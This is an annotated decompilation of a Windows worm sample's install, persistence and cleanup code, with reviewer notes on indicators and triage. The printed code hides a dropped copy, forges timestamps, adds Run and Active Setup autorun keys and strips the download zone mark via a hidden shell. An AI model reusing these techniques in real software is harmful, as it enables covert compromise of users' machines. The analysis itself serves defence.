// Decompiled with JetBrains decompiler
// Type: Ҧ߲๒ʽ໙ୄᴘ.ɱªᕢ᳭ᬻ˫ԧᵢ
// Assembly: dns-sd, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 4A42D535-5A92-4CC4-9677-40E6ACE36033
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Worm.Win32.Shakblades.ajg-02a9138068421a7a0b8924d80ebf6e55a41d8132d9fc1210df874ab33801b79f.exe
using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.IO;
namespace Ҧ߲๒ʽ໙ୄᴘ
{
    /// <summary>
    /// Install, persistence and self-removal routines of the decompiled sample.
    /// </summary>
    /// <remarks>
    /// Every path, key name and command used here is read from static members of an
    /// obfuscated settings type and passed through a string decoder. Both are defined
    /// outside this file, so the concrete values cannot be read from this listing.
    /// Each operation sits in its own try block with an empty catch: a failed step is
    /// silently skipped and the next one still runs, so a host may show only part of
    /// the artefacts described below.
    /// </remarks>
    internal class ɱªᕢ᳭ᬻ\u02EBԧᵢ
    {
        /// <summary>
        /// Runs the install sequence: drop the file, run the hidden command-shell step,
        /// then write the registry autorun entries. Call order is that of the original.
        /// </summary>
        public static void ᅰ()
        {
            P();
            ᯁព();
            ᶏපϔẞ();
        }

        /// <summary>
        /// Copies the running executable into the configured directory and, depending on
        /// settings flags, back-dates and hides the result.
        /// </summary>
        /// <remarks>
        /// Observable artefacts: a new directory, a copy of the process image inside it,
        /// a forged creation time, and the Hidden + NotContentIndexed attribute pair on
        /// the directory and on a file inside it.
        /// </remarks>
        private static void P()
        {
            // Step 1: create the target directory when it is missing.
            try
            {
                bool alreadyPresent = Directory.Exists(ȩזြڹᡡỾỔው.ౡ\u000F);
                if (!alreadyPresent)
                {
                    Directory.CreateDirectory(ȩזြڹᡡỾỔው.ౡ\u000F);
                }
            }
            catch
            {
                // Ignored by the sample.
            }

            // Step 2: copy the current process image to <directory>\<decoded name>,
            // overwriting any existing file of that name.
            try
            {
                string runningImage = Process.GetCurrentProcess().MainModule.FileName;
                string dropPath = Path.Combine(ȩזြڹᡡỾỔው.ౡ\u000F, \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ(ȩזြڹᡡỾỔው.\u0CEE᮸ᴑ, true));
                File.Copy(runningImage, dropPath, true);
            }
            catch
            {
                // Ignored by the sample.
            }

            // Step 3 (flag-gated): overwrite the creation time of the dropped path.
            // Random.Next excludes its upper bound, so the forged date is day 1-27,
            // month 1-11, of a year from 2000 up to the year before the current one,
            // and the time of day is always 00:00:00. A creation time at exactly
            // midnight that predates the item's other timestamps is a usable anomaly.
            // NOTE(review): on NTFS the $FILE_NAME timestamps are not expected to be
            // changed by this API and can be compared during triage - confirm.
            try
            {
                if (ȩזြڹᡡỾỔው.\u09C7)
                {
                    Random rng = new Random();
                    int fakeDay = rng.Next(1, 28);
                    int fakeMonth = rng.Next(1, 12);
                    int fakeYear = rng.Next(2000, DateTime.Now.Year);
                    string stampedPath = Path.Combine(ȩזြڹᡡỾỔው.ౡ\u000F, \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ(ȩזြڹᡡỾỔው.\u0CEE᮸ᴑ, true));
                    DateTime forgedCreation = new DateTime(fakeYear, fakeMonth, fakeDay);
                    Directory.SetCreationTime(stampedPath, forgedCreation);
                }
            }
            catch
            {
                // Ignored by the sample.
            }

            // Step 4 (flag-gated): hide the directory and exclude it from content indexing.
            if (ȩזြڹᡡỾỔው.όᘂ\u1CCCᥓ\u005B)
            {
                try
                {
                    File.SetAttributes(ȩזြڹᡡỾỔው.ౡ\u000F, FileAttributes.Hidden | FileAttributes.NotContentIndexed);
                }
                catch
                {
                    // Ignored by the sample.
                }
            }

            // Step 5 (flag-gated): the same attribute pair on a file inside the directory.
            // The file name here comes from a different decoder routine than the one used
            // for the copy in step 2; whether both yield the same name cannot be told
            // from this file.
            if (ȩזြڹᡡỾỔው.\u0B6E೮ᔙᩢ᷵ጔổ)
            {
                try
                {
                    string hiddenPath = Path.Combine(ȩזြڹᡡỾỔው.ౡ\u000F, \u1928ᔾዔ.յ(ȩזြڹᡡỾỔው.\u0CEE᮸ᴑ, true));
                    File.SetAttributes(hiddenPath, FileAttributes.Hidden | FileAttributes.NotContentIndexed);
                }
                catch
                {
                    // Ignored by the sample.
                }
            }
        }

        /// <summary>
        /// Writes up to three registry autorun entries, each gated by its own settings
        /// flag and each pointing at &lt;directory&gt;\&lt;decoded file name&gt;.
        /// </summary>
        /// <remarks>
        /// NOTE(review): Base64-decoding the first key literal and adding 0x3D to each
        /// byte gives text resembling <c>Software\Microsoft\Windows\CurrentVersion\Run</c>;
        /// the second resembles <c>SOFTWARE\Microsoft\Active Setup\Installed Components\</c>.
        /// Each contains four extra bytes the decoder presumably strips. The decoder is
        /// not part of this file - confirm before treating these as indicators.
        /// </remarks>
        public static void ᶏපϔẞ()
        {
            // Entry 1: value under the current-user hive.
            try
            {
                if (ȩזြڹᡡỾỔው.\u1C42\u193Eᙁᖔᠮ೬\u1BFB)
                {
                    RegistryKey userKey = Registry.CurrentUser.CreateSubKey(\u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("FjIpNzokNSgfECwmNTI2Mik3HxosMcO+nOsnMjo2HwY4NTUoMTcZKDU2LDIxHxU4MQ==", true));
                    string userValueName = \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ(ȩזြڹᡡỾỔው.\u1B65ᬧౢzƎ, true);
                    string userTarget = ȩזြڹᡡỾỔው.ౡ\u000F + "\\" + \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ(ȩזြڹᡡỾỔው.\u0CEE᮸ᴑ, true);
                    userKey.SetValue(userValueName, userTarget);
                }
            }
            catch
            {
                // Ignored by the sample.
            }

            // Entry 2: same encoded key path and value name, under the machine hive.
            try
            {
                if (ȩזြڹᡡỾỔው.கພ༢ਊȷඣᯇᝨ)
                {
                    RegistryKey machineKey = Registry.LocalMachine.CreateSubKey(\u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("FjIpNzokNSgfECwmNTI2Mik3HxosMcO+nOsnMjo2HwY4NTUoMTcZKDU2LDIxHxU4MQ==", true));
                    string machineValueName = \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ(ȩזြڹᡡỾỔው.\u1B65ᬧౢzƎ, true);
                    string machineTarget = ȩזြڹᡡỾỔው.ౡ\u000F + "\\" + \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ(ȩזြڹᡡỾỔው.\u0CEE᮸ᴑ, true);
                    machineKey.SetValue(machineValueName, machineTarget);
                }
            }
            catch
            {
                // Ignored by the sample.
            }

            // Entry 3: a machine-hive subkey whose name is the decoded literal plus a
            // decoded settings suffix. In this listing the two value names are written
            // as the literal strings shown, without passing through the decoder, so the
            // literals themselves are what would appear in the registry.
            // NOTE(review): the first literal resembles the encoded form of `StubPath`;
            // the missing decode may be a decompilation artefact - confirm on a sample.
            try
            {
                if (ȩזြڹᡡỾỔው.ԑᅤᴨᡰ\u02EFᣢỳ)
                {
                    string componentPath = \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("FhIJFxoEFQgfECwmNTI2Mik3HwQmNyw5KOPDvpzrFig3ODMfDDE2NyQvLygn4wYyMDMyMSgxNzYf", true) + \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ(ȩזြڹᡡỾỔው.ụү᳗, true);
                    RegistryKey componentKey = Registry.LocalMachine.CreateSubKey(componentPath);
                    string componentTarget = ȩזြڹᡡỾỔው.ౡ\u000F + "\\" + \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ(ȩזြڹᡡỾỔው.\u0CEE᮸ᴑ, true);
                    componentKey.SetValue("Fjc4JcO+nOsTJDcr", componentTarget);
                    componentKey.SetValue("BjAGKzC99eEAMR4pKSIh", 1, RegistryValueKind.DWord);
                }
            }
            catch
            {
                // Ignored by the sample.
            }
        }

        /// <summary>
        /// Starts a windowless cmd.exe with redirected standard input, writes two lines
        /// to it (a <c>cd</c> into the configured directory and one decoded, formatted
        /// command), closes the stream and kills the process.
        /// </summary>
        /// <remarks>
        /// The commands travel over standard input, so they do not appear in the
        /// cmd.exe command line; the observable is a cmd.exe child started with no
        /// arguments and no window. Kill() follows Close() immediately, so whether the
        /// shell has processed both lines by then is timing dependent.
        /// NOTE(review): decoding the template the same way as the registry literals
        /// (Base64, then +0x3D per byte) gives text resembling
        /// <c>echo [zoneTransfer]ZoneID = 2 &gt; {0}:ZONE.identifier</c>, i.e. a rewrite
        /// of the Zone.Identifier alternate data stream on the dropped file - confirm
        /// against the decoder, which is not in this file.
        /// </remarks>
        private static void ᯁព()
        {
            try
            {
                Process shell = new Process();
                ProcessStartInfo shellInfo = new ProcessStartInfo();
                shellInfo.FileName = "cmd.exe";
                shellInfo.UseShellExecute = false;
                shellInfo.RedirectStandardInput = true;
                shellInfo.CreateNoWindow = true;
                shellInfo.WindowStyle = ProcessWindowStyle.Hidden;
                shell.StartInfo = shellInfo;
                shell.Start();

                StreamWriter shellInput = shell.StandardInput;
                shellInput.WriteLine("cd " + ȩזြڹᡡỾỔው.ౡ\u000F);

                string commandTemplate = \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("KCYrMuMePTIxKBc1JDE2KSg1IB0yMSgMB8O+nOvjAOP14wHjPvNA/R0SEQjxLCcoMTcsKSwoNQ==", true);
                string droppedName = \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ(ȩזြڹᡡỾỔው.\u0CEE᮸ᴑ, true);
                shellInput.WriteLine(string.Format(commandTemplate, (object) droppedName));

                shellInput.Close();
                shell.Kill();
            }
            catch
            {
                // Ignored by the sample.
            }
        }

        /// <summary>
        /// Removal routine: deletes registry values and subkeys, then hands over to the
        /// self-relocation step.
        /// </summary>
        /// <remarks>
        /// The machine-hive value is deleted under a name taken from a different
        /// settings member than the one the install routine writes with, so the
        /// machine-hive entry is removed only if both decode to the same name. The
        /// value keys are opened with CreateSubKey, which creates them when absent.
        /// Remediation should verify each location independently rather than assume
        /// this routine leaves the host clean.
        /// </remarks>
        public static void \u171D\u0018ẖေᒷᐦᵨỨ()
        {
            // Current-user value, same name member as used at install time.
            try
            {
                RegistryKey userKey = Registry.CurrentUser.CreateSubKey(\u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("FjIpNzokNSgfECwmNTI2Mik3HxosMcO+nOsnMjo2HwY4NTUoMTcZKDU2LDIxHxU4MQ==", true));
                string userValueName = \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ(ȩזြڹᡡỾỔው.\u1B65ᬧౢzƎ, true);
                userKey.DeleteValue(userValueName);
            }
            catch
            {
                // Ignored by the sample.
            }

            // Machine-hive value, name taken from a different settings member.
            try
            {
                RegistryKey machineKey = Registry.LocalMachine.CreateSubKey(\u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("FjIpNzokNSgfECwmNTI2Mik3HxosMcO+nOsnMjo2HwY4NTUoMTcZKDU2LDIxHxU4MQ==", true));
                string machineValueName = \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ(ȩזြڹᡡỾỔው.\u02DBˬଋธ, true);
                machineKey.DeleteValue(machineValueName);
            }
            catch
            {
                // Ignored by the sample.
            }

            // The machine-hive subkey written as entry 3 of the install routine.
            try
            {
                string componentPath = \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("FhIJFxoEFQgfECwmNTI2Mik3HwQmNyw5KOPDvpzrFig3ODMfDDE2NyQvLygn4wYyMDMyMSgxNzYf", true) + \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ(ȩזြڹᡡỾỔው.ụү᳗, true);
                Registry.LocalMachine.DeleteSubKey(componentPath);
            }
            catch
            {
                // Ignored by the sample.
            }

            // A further subkey whose hive and path both come from settings; only the
            // current-user and local-machine hives are handled, any other value is a no-op.
            try
            {
                var configuredHive = ȩזြڹᡡỾỔው.Փᬃᜐᣖ̗ᨠᵴ;
                if (configuredHive == RegistryHive.CurrentUser)
                {
                    Registry.CurrentUser.DeleteSubKey(ȩזြڹᡡỾỔው.\u187Dठ\u1371aːࠍؒ\u0A7Dᇁ);
                }
                else if (configuredHive == RegistryHive.LocalMachine)
                {
                    Registry.LocalMachine.DeleteSubKey(ȩזြڹᡡỾỔው.\u187Dठ\u1371aːࠍؒ\u0A7Dᇁ);
                }
            }
            catch
            {
                // Ignored by the sample.
            }

            \u0AFD();
        }

        /// <summary>
        /// Moves the running executable to a freshly generated temp-file path and passes
        /// that path to an external helper.
        /// </summary>
        /// <remarks>
        /// Path.GetTempFileName creates an empty file; it is deleted so the move can take
        /// its name. The helper and its flag enum are defined outside this file.
        /// NOTE(review): the (path, null, flag) argument shape resembles a MoveFileEx
        /// delete-on-reboot call - TODO confirm against the helper's definition. If so,
        /// the image remains in the temp directory until the next restart.
        /// </remarks>
        public static void \u0AFD()
        {
            try
            {
                string stagingPath = Path.GetTempFileName();
                File.Delete(stagingPath);
                string runningImage = Process.GetCurrentProcess().MainModule.FileName;
                File.Move(runningImage, stagingPath);
                \u0667Ѹ.\u1936\u0A50Ȁ\u0A84ᠬ\u1AE7(stagingPath, (string) null, \u0667Ѹ.ቩᩬᐜ̯ṅडၿ.ᑹ\u17FCנᒞ͍ሴǒ);
            }
            catch (Exception)
            {
                // Ignored by the sample.
            }
        }

        // Three-member enum with obfuscated names; nothing in this file refers to it,
        // so its meaning cannot be determined here.
        public enum \u0EF7ᶟᔂᢪĉᤘᢁַắ
        {
            የ᠖\u0E6Cᬰᥥ,
            ฏᆈǸ᱙Ȏ\u1CFD༾,
            \u05AFᩚၡ\u00F7ᩯ\u1B4Cጝ,
        }
    }
}